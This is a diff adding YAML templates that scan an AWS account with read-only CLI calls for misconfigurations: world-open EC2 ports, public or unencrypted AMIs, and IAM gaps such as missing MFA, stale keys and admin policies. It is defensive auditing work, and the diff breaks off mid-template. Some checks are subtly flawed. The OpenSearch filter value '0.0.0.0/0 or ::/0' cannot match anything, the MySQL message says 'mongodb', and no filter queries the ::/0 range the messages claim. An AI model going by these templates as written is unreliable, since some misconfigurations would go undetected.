diff --git a/cloud/aws/ec2/ec2-unrestricted-mssql.yaml b/cloud/aws/ec2/ec2-unrestricted-mssql.yaml
new file mode 100644
index 0000000000..5ea67dea98
--- /dev/null
+++ b/cloud/aws/ec2/ec2-unrestricted-mssql.yaml
@@ -0,0 +1,37 @@
+id: ec2-unrestricted-mssql
+info:
+ name: Unrestricted Access to SQL on EC2
+ author: princechaddha
+ severity: high
+ description: |
+ Identifies open inbound access to Microsoft SQL Server on Amazon EC2 instances. Checks for security groups allowing unrestricted access (0.0.0.0/0 or ::/0) on TCP port 1433, increasing risks to SQL databases.
+ impact: |
+ Unrestricted access on port 1433 exposes Microsoft SQL Server instances to potential unauthorized access, data breaches, and other security vulnerabilities.
+ remediation: |
+ Restrict inbound traffic on TCP port 1433 to known, secure IP addresses. Regularly review and update security group rules to maintain minimal access requirements.
+ reference:
+ - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-security-groups.html
+ tags: cloud,devops,aws,amazon,ec2,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=1433 Name=ip-permission.to-port,Values=1433 Name=ip-permission.cidr,Values='0.0.0.0/0' --output json --query 'SecurityGroups[*].GroupId'
+
+ extractors:
+ - type: json
+ name: securitygroup
+ internal: true
+ json:
+ - '.[]'
+
+ - type: dsl
+ dsl:
+ - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 1433"'
+# digest: 4a0a0047304502207fea1bdfd1275fd4132e71cafa55258390fdaaa1ed649df3bbac41baa9abf1b2022100965299640f42e2ce5f12a3f624939a120518421a38e91ecbcdcdbae3066a6843:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/ec2/ec2-unrestricted-mysql.yaml b/cloud/aws/ec2/ec2-unrestricted-mysql.yaml
new file mode 100644
index 0000000000..5fc050e037
--- /dev/null
+++ b/cloud/aws/ec2/ec2-unrestricted-mysql.yaml
@@ -0,0 +1,37 @@
+id: ec2-unrestricted-mysql
+info:
+ name: Unrestricted MySQL Access on EC2
+ author: princechaddha
+ severity: critical
+ description: |
+ Identifies unrestricted inbound access to MySQL database servers on Amazon EC2 instances, specifically targeting TCP port 3306.
+ impact: |
+ Unrestricted access to MySQL can lead to unauthorized data access, data manipulation, or exploitation of the database server.
+ remediation: |
+ Restrict inbound access on TCP port 3306 to known, necessary IP addresses or ranges, and avoid using 0.0.0.0/0 or ::/0.
+ reference:
+ - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-security-groups.html
+ tags: cloud,devops,aws,amazon,ec2,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=3306 Name=ip-permission.to-port,Values=3306 Name=ip-permission.cidr,Values='0.0.0.0/0' --output json --query 'SecurityGroups[*].GroupId'
+
+ extractors:
+ - type: json
+ name: securitygroup
+ internal: true
+ json:
+ - '.[]'
+
+ - type: dsl
+ dsl:
+ - 'securitygroup + " security group(s) alows unrestricted mongodb access (0.0.0.0/0 or ::/0) on port 3306"'
+# digest: 4a0a00473045022100ff19bb5e8c3dfe1f8e153bd309d866713f3e33c0b54882652f6489cc4bac292c02200d43740086e393886f7dbaca0a05947741687ed853c8e128a7b53bc2d926d995:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/ec2/ec2-unrestricted-netbios.yaml b/cloud/aws/ec2/ec2-unrestricted-netbios.yaml
new file mode 100644
index 0000000000..bad57ee6a9
--- /dev/null
+++ b/cloud/aws/ec2/ec2-unrestricted-netbios.yaml
@@ -0,0 +1,37 @@
+id: ec2-unrestricted-netbios
+info:
+ name: Unrestricted NetBIOS Access in EC2
+ author: princechaddha
+ severity: critical
+ description: |
+ Checks for inbound rules in Amazon EC2 security groups that allow unrestricted access on TCP port 139 and UDP ports 137 and 138, increasing the risk of unauthorized access and potential security breaches.
+ impact: |
+ Unrestricted NetBIOS access can expose EC2 instances to network-based attacks, compromising data integrity and system availability.
+ remediation: |
+ Restrict access to TCP port 139 and UDP ports 137 and 138 in EC2 security groups. Implement strict access control based on the principle of least privilege.
+ reference:
+ - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-security-groups.html
+ tags: cloud,devops,aws,amazon,ec2,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=137,138,139 Name=ip-permission.to-port,Values=137,138,139 Name=ip-permission.cidr,Values='0.0.0.0/0' --output json --query 'SecurityGroups[*].GroupId'
+
+ extractors:
+ - type: json
+ name: securitygroup
+ internal: true
+ json:
+ - '.[]'
+
+ - type: dsl
+ dsl:
+ - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on ports 137, 138 or 139"'
+# digest: 4b0a00483046022100b04e63ff33e72a571e6fd0e696ab8a39a420f24de0a1d398686da93124a96e50022100bc0a89161a20972f692bba232833227053093823f47628cbb97ca0564c8d6c54:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/ec2/ec2-unrestricted-opensearch.yaml b/cloud/aws/ec2/ec2-unrestricted-opensearch.yaml
new file mode 100644
index 0000000000..de4c5ecc56
--- /dev/null
+++ b/cloud/aws/ec2/ec2-unrestricted-opensearch.yaml
@@ -0,0 +1,37 @@
+id: ec2-unrestricted-opensearch
+info:
+ name: Unrestricted OpenSearch Access
+ author: princechaddha
+ severity: critical
+ description: |
+ Checks EC2 security groups for inbound rules allowing unrestricted access to OpenSearch on TCP port 9200. Restricts access to essential IP addresses only.
+ impact: |
+ Unrestricted access to OpenSearch can lead to unauthorized data access, modification, or denial of service attacks.
+ remediation: |
+ Modify EC2 security group rules to limit access to TCP port 9200 for OpenSearch, allowing only necessary IPs, implementing the principle of least privilege.
+ reference:
+ - https://en.wikipedia.org/wiki/OpenSearch
+ tags: cloud,devops,aws,amazon,opensearch,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=9200 Name=ip-permission.to-port,Values=9200 Name=ip-permission.cidr,Values='0.0.0.0/0 or ::/0' --query 'SecurityGroups[*].GroupId' --output json
+
+ extractors:
+ - type: json
+ name: securitygroup
+ internal: true
+ json:
+ - '.[]'
+
+ - type: dsl
+ dsl:
+ - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 9200"'
+# digest: 490a004630440220592b35acadc3d541d7bab687bb36ff879999897d4c57bee946714c37eef4c37a0220303632eb1d63cfd0d31301ed29423993181942dae0da7a842b80921b989b6b4c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/ec2/ec2-unrestricted-oracle.yaml b/cloud/aws/ec2/ec2-unrestricted-oracle.yaml
new file mode 100644
index 0000000000..295f3776ab
--- /dev/null
+++ b/cloud/aws/ec2/ec2-unrestricted-oracle.yaml
@@ -0,0 +1,37 @@
+id: ec2-unrestricted-oracle
+info:
+ name: Unrestricted Oracle DB Access
+ author: princechaddha
+ severity: critical
+ description: |
+ Identifies unrestricted inbound access to Oracle databases in Amazon EC2 instances, which increases the risk of unauthorized access and attacks.
+ impact: |
+ Allows potential unauthorized access to the Oracle database, leading to data leakage, data manipulation, or further exploitation.
+ remediation: |
+ Restrict inbound traffic on TCP port 1521 to known IPs or ranges and employ strict access controls.
+ reference:
+ - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-rules-reference.html
+ tags: cloud,devops,aws,amazon,ec2,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=1521 Name=ip-permission.to-port,Values=1521 Name=ip-permission.cidr,Values='0.0.0.0/0' --query 'SecurityGroups[*].GroupId' --output json
+
+ extractors:
+ - type: json
+ name: securitygroup
+ internal: true
+ json:
+ - '.[]'
+
+ - type: dsl
+ dsl:
+ - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 1521"'
+# digest: 490a00463044022016b07bbcc6591afe7642ce52428085c7c2e5f2d923acb812a880bc658d607d5a022073f1dc85bb8b3e17f760ded2efa94b2aea4c14a6eb0fa135a1adb12bf604084a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/ec2/ec2-unrestricted-pgsql.yaml b/cloud/aws/ec2/ec2-unrestricted-pgsql.yaml
new file mode 100644
index 0000000000..e11ac521b0
--- /dev/null
+++ b/cloud/aws/ec2/ec2-unrestricted-pgsql.yaml
@@ -0,0 +1,37 @@
+id: ec2-unrestricted-pgsql
+info:
+ name: Unrestricted PostgreSQL Access
+ author: princechaddha
+ severity: critical
+ description: |
+ Identifies unrestricted inbound access to PostgreSQL databases in Amazon EC2 security groups, which can expose databases to security risks.
+ impact: |
+ Unrestricted access on TCP port 5432 increases vulnerability to unauthorized access and potential data breaches.
+ remediation: |
+ Restrict inbound traffic to PostgreSQL servers by setting stringent rules in EC2 security groups, limiting access to specific IPs or ranges.
+ reference:
+ - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-network-security.html#security-group-rules
+ tags: cloud,devops,aws,amazon,ec2,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=5432 Name=ip-permission.to-port,Values=5432 Name=ip-permission.cidr,Values='0.0.0.0/0' --query 'SecurityGroups[*].GroupId' --output json
+
+ extractors:
+ - type: json
+ name: securitygroup
+ internal: true
+ json:
+ - '.[]'
+
+ - type: dsl
+ dsl:
+ - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 5432"'
+# digest: 4a0a004730450221009dc490795c723cfe321511e129d2e6ff3de628de4b81979843eae48bb1b3ba7502200ffde00d7cb8957a0b72aa8bd39b4adde0bbc0236d7b671dd8eade57d62b69bc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/ec2/ec2-unrestricted-rdp.yaml b/cloud/aws/ec2/ec2-unrestricted-rdp.yaml
new file mode 100644
index 0000000000..db537892da
--- /dev/null
+++ b/cloud/aws/ec2/ec2-unrestricted-rdp.yaml
@@ -0,0 +1,37 @@
+id: ec2-unrestricted-rdp
+info:
+ name: Restrict EC2 RDP Access
+ author: princechaddha
+ severity: high
+ description: |
+ Check Amazon EC2 security groups for inbound rules that allow unrestricted RDP access and restrict access to trusted IPs.
+ impact: |
+ Unrestricted RDP access increases the risk of unauthorized access and potential breaches.
+ remediation: |
+ Modify the EC2 security group rules to limit RDP access (TCP 3389) to known, trusted IP addresses or ranges.
+ reference:
+ - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/authorizing-access-to-an-instance.html
+ tags: cloud,devops,aws,amazon,ec2,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=3389 Name=ip-permission.to-port,Values=3389 Name=ip-permission.cidr,Values='0.0.0.0/0' --output json --query 'SecurityGroups[*].GroupId'
+
+ extractors:
+ - type: json
+ name: securitygroup
+ internal: true
+ json:
+ - '.[]'
+
+ - type: dsl
+ dsl:
+ - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 3389"'
+# digest: 4a0a00473045022002ecd5ab647c14882b81b474962bb00f2efc2099d867125b8deb662e1c7a8e70022100877b207077fd1c5a89c0529f98c757af212d85b0d086a8ef00052ebc9005f0a6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/ec2/ec2-unrestricted-redis.yaml b/cloud/aws/ec2/ec2-unrestricted-redis.yaml
new file mode 100644
index 0000000000..1295c7aea3
--- /dev/null
+++ b/cloud/aws/ec2/ec2-unrestricted-redis.yaml
@@ -0,0 +1,37 @@
+id: ec2-unrestricted-redis
+info:
+ name: Unrestricted Redis Access
+ author: princechaddha
+ severity: critical
+ description: |
+ Checks for inbound rules in Amazon EC2 security groups that allow unrestricted access to Redis cache server instances on TCP port 6379.
+ impact: |
+ Unrestricted access can expose Redis instances to unauthorized access and potential security breaches.
+ remediation: |
+ Restrict inbound access to Redis instances by updating EC2 security group rules to allow only specific, trusted IP addresses.
+ reference:
+ - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-security-groups.html
+ tags: cloud,devops,aws,amazon,ec2,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=6379 Name=ip-permission.to-port,Values=6379 Name=ip-permission.cidr,Values='0.0.0.0/0' --output json --query 'SecurityGroups[*].GroupId'
+
+ extractors:
+ - type: json
+ name: securitygroup
+ internal: true
+ json:
+ - '.[]'
+
+ - type: dsl
+ dsl:
+ - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 6379"'
+# digest: 4b0a00483046022100a19a6281bbac4a97ec0b09a1eaa1f789d3eb364bb152c2110e8aacaba4da4895022100c385619aae77905775c394990ef99a35e78f11941d2cb7579db73b2f6a4ef013:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/ec2/ec2-unrestricted-smtp.yaml b/cloud/aws/ec2/ec2-unrestricted-smtp.yaml
new file mode 100644
index 0000000000..6a1f64c7b9
--- /dev/null
+++ b/cloud/aws/ec2/ec2-unrestricted-smtp.yaml
@@ -0,0 +1,37 @@
+id: ec2-unrestricted-smtp
+info:
+ name: Unrestricted SMTP Access in EC2
+ author: princechaddha
+ severity: critical
+ description: |
+ Identifies unrestricted inbound access on TCP port 25 for EC2 security groups, which increases the risk of SMTP-related attacks.
+ impact: |
+ Allowing unrestricted SMTP access can lead to spamming, mail relay abuse, and potentially compromise mail servers.
+ remediation: |
+ Restrict TCP port 25 access to known, necessary IP addresses only. Avoid using 0.0.0.0/0 or ::/0 in security group rules.
+ reference:
+ - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/authorizing-access-to-an-instance.html
+ tags: cloud,devops,aws,amazon,ec2,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=25 Name=ip-permission.to-port,Values=25 Name=ip-permission.cidr,Values='0.0.0.0/0' --output json --query 'SecurityGroups[*].GroupId'
+
+ extractors:
+ - type: json
+ name: securitygroup
+ internal: true
+ json:
+ - '.[]'
+
+ - type: dsl
+ dsl:
+ - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 25"'
+# digest: 490a0046304402207f49f7b3e8b59a10d998936b7fa721458e3659599ca2f4f284aedc250af454e902206668d8d3207fa24654b24c96d1df3b590be443aa8f26d5ed0e2a6e7bef4919a2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/ec2/ec2-unrestricted-ssh.yaml b/cloud/aws/ec2/ec2-unrestricted-ssh.yaml
new file mode 100644
index 0000000000..32b9614dee
--- /dev/null
+++ b/cloud/aws/ec2/ec2-unrestricted-ssh.yaml
@@ -0,0 +1,37 @@
+id: ec2-unrestricted-ssh
+info:
+ name: Unrestricted SSH Access in EC2
+ author: princechaddha
+ severity: high
+ description: |
+ Checks for inbound rules in Amazon EC2 security groups that allow unrestricted SSH access (0.0.0.0/0 or ::/0) on TCP port 22, indicating a security risk by exposing the SSH server to the internet.
+ impact: |
+ Unrestricted SSH access increases the risk of unauthorized access and potential brute force attacks against the SSH server, compromising the security of the EC2 instances.
+ remediation: |
+ Restrict SSH access in EC2 security groups to trusted IP addresses or ranges, adhering to the Principle of Least Privilege (POLP) and mitigating the risk of unauthorized access.
+ reference:
+ - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-rules-reference.html
+ tags: cloud,devops,aws,amazon,ec2,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=22 Name=ip-permission.to-port,Values=22 Name=ip-permission.cidr,Values='0.0.0.0/0' --output json --query 'SecurityGroups[*].GroupId'
+
+ extractors:
+ - type: json
+ name: securitygroup
+ internal: true
+ json:
+ - '.[]'
+
+ - type: dsl
+ dsl:
+ - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 22"'
+# digest: 4a0a0047304502205ba8e3a283bd695b4f0267dab41892b97e7ea38371e15259616ac64c78fe117c0221008ab0347e4be89942208e1bf266891d41678a76a3ec0ce920f060d80429539688:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/ec2/ec2-unrestricted-telnet.yaml b/cloud/aws/ec2/ec2-unrestricted-telnet.yaml
new file mode 100644
index 0000000000..0c24c6f442
--- /dev/null
+++ b/cloud/aws/ec2/ec2-unrestricted-telnet.yaml
@@ -0,0 +1,37 @@
+id: ec2-unrestricted-telnet
+info:
+ name: Restrict EC2 Telnet Access
+ author: princechaddha
+ severity: critical
+ description: |
+ Checks for unrestricted inbound Telnet access (TCP port 23) in Amazon EC2 security groups, highlighting potential security risks.
+ impact: |
+ Unrestricted Telnet access can expose EC2 instances to unauthorized access and potential security breaches.
+ remediation: |
+ Restrict inbound Telnet access by updating EC2 security group rules to allow only trusted IP ranges or disabling Telnet if not required.
+ reference:
+ - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/authorizing-access-to-an-instance.html
+ tags: cloud,devops,aws,amazon,ec2,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=23 Name=ip-permission.to-port,Values=23 Name=ip-permission.cidr,Values='0.0.0.0/0' --output json --query 'SecurityGroups[*].GroupId'
+
+ extractors:
+ - type: json
+ name: securitygroup
+ internal: true
+ json:
+ - '.[]'
+
+ - type: dsl
+ dsl:
+ - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 23"'
+# digest: 4a0a004730450221009249024faa045e4c4a777389a760b53b294ea9285a93048a108e694ffdb7401302201be48e1ed82fb8dc69023ae0a15c891a5592f4c00d1c979e07e084456aed7bc6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/ec2/publicly-shared-ami.yaml b/cloud/aws/ec2/publicly-shared-ami.yaml
new file mode 100644
index 0000000000..f371872c2f
--- /dev/null
+++ b/cloud/aws/ec2/publicly-shared-ami.yaml
@@ -0,0 +1,56 @@
+id: publicly-shared-ami
+info:
+ name: Publicly Shared AMI
+ author: princechaddha
+ severity: medium
+ description: |
+ Checks if Amazon Machine Images (AMIs) are publicly shared, potentially exposing sensitive data.
+ impact: |
+ Public sharing of AMIs can lead to unauthorized access and compromise of sensitive information contained within these images.
+ remediation: |
+ Restrict AMI sharing to specific, trusted AWS accounts and ensure they are not publicly accessible.
+ reference:
+ - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/sharingamis-explicit.html
+ tags: cloud,devops,aws,amazon,ami,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+flow: |
+ code(1)
+ for(let AmiName of iterate(template.amis)){
+ set("ami", AmiName)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-images --region $region --owners self --output json --query 'Images[*].ImageId' --output json
+
+ extractors:
+ - type: json
+ name: amis
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-images --region $region --image-ids $ami --owners self --query 'Images[*].Public'
+
+ matchers:
+ - type: word
+ words:
+ - "true"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - 'ami + " AMI is publically shared"'
+# digest: 4a0a004730450220193e6725ccb97bbd7071e4dad36601e0e8625dd4901a653eacf3141faf6e8a82022100d7d61c14183f4a6563ac749634aa9af5e01332d52583cba6e703cf4958bbe63f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/ec2/unencrypted-aws-ami.yaml b/cloud/aws/ec2/unencrypted-aws-ami.yaml
new file mode 100644
index 0000000000..07452176fe
--- /dev/null
+++ b/cloud/aws/ec2/unencrypted-aws-ami.yaml
@@ -0,0 +1,56 @@
+id: unencrypted-aws-ami
+info:
+ name: Unencrypted AWS AMI
+ author: princechaddha
+ severity: high
+ description: |
+ Ensure Amazon Machine Images (AMIs) are encrypted to meet data-at-rest encryption compliance and protect sensitive data.
+ impact: |
+ Unencrypted AMIs can expose sensitive data to unauthorized access, risking data breaches and non-compliance with data protection regulations.
+ remediation: |
+ Encrypt your AMIs using AWS managed keys or customer-managed keys in the AWS Key Management Service (KMS) to ensure data security.
+ reference:
+ - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIEncryption.html
+ tags: cloud,devops,aws,amazon,ec2,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+flow: |
+ code(1)
+ for(let AmiName of iterate(template.amis)){
+ set("ami", AmiName)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-images --region $region --owners self --output json --query 'Images[*].ImageId'
+
+ extractors:
+ - type: json
+ name: amis
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-images --region $region --image-ids $ami --query 'Images[*].BlockDeviceMappings[*].Ebs.Encrypted[]'
+
+ matchers:
+ - type: word
+ words:
+ - "false"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - 'ami + " AMI is not encrypted"'
+# digest: 4a0a00473045022100a7b00e475c508994eab83d044d65086d511d0dcdde83abed644133c35775d4a402203ff217b94895c174e5d6036a27c3cedba4e74cc0b2a4fb957b71390c2d7454eb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/iam/iam-access-analyzer.yaml b/cloud/aws/iam/iam-access-analyzer.yaml
new file mode 100644
index 0000000000..60e905f26f
--- /dev/null
+++ b/cloud/aws/iam/iam-access-analyzer.yaml
@@ -0,0 +1,29 @@
+id: iam-access-analyzer
+info:
+ name: IAM Access Analyzer is not Used
+ author: princechaddha
+ severity: medium
+ description: |
+ Checks if Amazon IAM Access Analyzer is active for identifying unsolicited access risks in AWS resources
+ reference:
+ - https://docs.aws.amazon.com/cli/latest/reference/accessanalyzer/list-analyzers.html
+ tags: cloud,devops,aws,amazon,iam,aws-cloud-config
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws accessanalyzer list-analyzers --query 'analyzers[*].arn'
+
+ matchers:
+ - type: word
+ words:
+ - "[]"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"IAM Access Analyzer is not Used in your AWS account"'
+# digest: 4a0a00473045022030390836bad5e6468e11d2dbf56d7f809db536831d633867e2d605ec841e8b9d022100ea2e18d9be8f713b472d94507e0df31148e1a1403df2ba103fbf8dacee76173d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/iam/iam-expired-ssl.yaml b/cloud/aws/iam/iam-expired-ssl.yaml
new file mode 100644
index 0000000000..948bc47dd2
--- /dev/null
+++ b/cloud/aws/iam/iam-expired-ssl.yaml
@@ -0,0 +1,30 @@
+id: iam-expired-ssl
+info:
+ name: Remove Expired SSL/TLS Certificates in AWS IAM
+ author: princechaddha
+ severity: high
+ description: |
+ Checks for expired SSL/TLS certificates from AWS IAM
+ reference:
+ - https://docs.aws.amazon.com/cli/latest/reference/iam/list-server-certificates.html
+ tags: cloud,devops,aws,amazon,iam,ssl,aws-cloud-config
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws iam list-server-certificates | jq -r '.ServerCertificateMetadataList[] | select(.Expiration | fromdateiso8601 < now) | .ServerCertificateName'
+
+ extractors:
+ - type: regex
+ name: certificate
+ internal: true
+ regex:
+ - '\b[a-zA-Z0-9]+\b'
+
+ - type: dsl
+ dsl:
+ - 'certificate + " Certificate is expired in your AWS account"'
+# digest: 490a0046304402203c1c60995a3652d60b90c6b18c6aa5e9239fa9cc964b9ccd50e5e1660af1ab29022055d501dd4c86142b75633db268ceb4a226c09b9e1e69b04c8cc7278b5f4fdf48:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/iam/iam-full-admin-privileges.yaml b/cloud/aws/iam/iam-full-admin-privileges.yaml
new file mode 100644
index 0000000000..e48897a0c8
--- /dev/null
+++ b/cloud/aws/iam/iam-full-admin-privileges.yaml
@@ -0,0 +1,52 @@
+id: iam-full-admin-privileges
+info:
+ name: Overly Permissive IAM Policies
+ author: princechaddha
+ severity: high
+ description: |
+ Verifies that no Amazon IAM policies grant full administrative privileges, ensuring adherence to the Principle of Least Privilege
+ reference:
+ - https://docs.aws.amazon.com/cli/latest/reference/iam/get-policy-version.html
+ tags: cloud,devops,aws,amazon,iam,aws-cloud-config
+
+flow: |
+ code(1)
+ for(let PolicyName of iterate(template.policies)){
+ set("policy", PolicyName)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws iam list-policies --scope Local --query 'Policies[*].Arn'
+
+ extractors:
+ - type: json # type of the extractor
+ internal: true
+ name: policies
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws iam get-policy-version --policy-arn $policy --version-id v1 --query 'PolicyVersion.Document'
+
+ matchers:
+ - type: word
+ words:
+ - '"Effect": "Allow"'
+ - '"Action": "*"'
+ - '"Resource": "*"'
+ condition: and
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"The IAM policy " + policy +" is Overly Permissive"'
+# digest: 4a0a0047304502203eeeb24dbf1cfd3f41550e0c0b66bfb9ba23ea9912139aa2385e48b3a668d336022100dcb4c90fbb816ab247ea9d506497b900640b3d052bb2ce2b2f8b9a9e7fe58d9e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/iam/iam-key-rotation-90days.yaml b/cloud/aws/iam/iam-key-rotation-90days.yaml
new file mode 100644
index 0000000000..e8525012ee
--- /dev/null
+++ b/cloud/aws/iam/iam-key-rotation-90days.yaml
@@ -0,0 +1,50 @@
+id: iam-key-rotation-90days
+info:
+ name: IAM Access Key Rotation - 90-Day Policy
+ author: princechaddha
+ severity: high
+ description: |
+ Checks if IAM user access keys are rotated every 90 days to minimize accidental exposures and unauthorized access risks
+ reference:
+ - https://docs.aws.amazon.com/cli/latest/reference/iam/list-access-keys.html
+ tags: cloud,devops,aws,amazon,iam,aws-cloud-config
+
+flow: |
+ code(1)
+ for(let UserName of iterate(template.users)){
+ set("user", UserName)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws iam list-users --query 'Users[*].UserName'
+
+ extractors:
+ - type: json # type of the extractor
+ internal: true
+ name: users
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws iam list-access-keys --user-name $user | jq -r '.AccessKeyMetadata[] | select((.CreateDate[:-6] | strptime("%Y-%m-%dT%H:%M:%S") | mktime) < (now - (90 * 86400))) | .AccessKeyId'
+
+ extractors:
+ - type: regex # type of the extractor
+ name: accesskey
+ internal: true
+ regex:
+ - '^AK.*'
+
+ - type: dsl
+ dsl:
+ - '"The IAM Key " + accesskey +" is older than 90 days"'
+# digest: 4a0a00473045022100d15b76ce838fa09da565afb9414204e3a5bc5487d1cca1ea4fb3560c339ac6f60220291edc1503af6dfa14709487d50d0eff776aafaaf1d07580cc1199ea21fb48ed:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/iam/iam-mfa-enable.yaml b/cloud/aws/iam/iam-mfa-enable.yaml
new file mode 100644
index 0000000000..5d649f479c
--- /dev/null
+++ b/cloud/aws/iam/iam-mfa-enable.yaml
@@ -0,0 +1,49 @@
+id: iam-mfa-enable
+info:
+ name: MFA not enabled for AWS IAM Console User
+ author: princechaddha
+ severity: high
+ description: |
+ Verifies that Multi-Factor Authentication (MFA) is enabled for all IAM users with console access in AWS
+ reference:
+ - https://docs.aws.amazon.com/cli/latest/reference/iam/list-mfa-devices.html
+ tags: cloud,devops,aws,amazon,iam,aws-cloud-config
+
+flow: |
+ code(1)
+ for(let UserName of iterate(template.users)){
+ set("user", UserName)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws iam list-users --query 'Users[*].UserName'
+
+ extractors:
+ - type: json # type of the extractor
+ internal: true
+ name: users
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws iam list-mfa-devices --user-name $user --query 'MFADevices'
+
+ matchers:
+ - type: word
+ words:
+ - "[]"
+
+ extractors:
+ - type: dsl
+ dsl:
